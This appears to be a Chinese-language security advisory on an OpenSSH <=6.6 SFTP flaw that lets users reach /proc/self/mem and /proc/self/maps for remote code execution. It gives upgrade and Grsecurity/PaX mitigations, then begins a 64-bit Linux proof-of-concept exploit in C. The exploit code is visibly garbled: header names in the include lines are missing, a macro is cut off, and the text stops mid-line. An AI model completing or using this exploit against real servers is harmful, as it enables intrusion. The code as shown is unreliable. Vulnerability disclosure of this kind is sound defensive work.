近日曝出OpenSSH SFTP 远程溢出漏洞。OpenSSH服务器中如果OpenSSH服务器中没有配置"ChrootDirectory",普通用户就可以访问所有文件系统的资源,包括 /proc,在>=2.6.x的Linux内核上,/proc/self/maps会显示你的内存布局,/proc/self/mem可以让你任意在当前进程上下文中读写,而综合两者特性则可以造成远程溢出。
目前受影响的版本是<=OpenSSH 6.6,建议使用该系统的用户尽快升级到最新版本OpenSSH 6.7, OpenSSH 6.7包含了降低风险的方案:sftp-server使用prctl()来阻止直接访问/proc/self/{mem,maps}。Grsecurity/PaX直接禁止了/proc/pid/mem的可写,所以如果您的生产环境中部署了Grsecurity/PaX的话这个漏洞可以不用担心.
OpenSSH <=6.6 SFTP 远程溢出漏洞 PoC for 64bit Linux:#define _GNU_SOURCE
// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
// (In other words, please don't use this against other people's machines.)
#include #include #include
#include
#include
#include
#include
#include
#include
#define min(a,b) (((a)
sftp_session sftp;
size_t grab_file(char *rpath, char **out) {
size_t allocated = 4000, used = 0;
*out = calloc(1, allocated+1);
sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
while (1) {
ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
if (nbytes == 0) {
(*out)[used] = '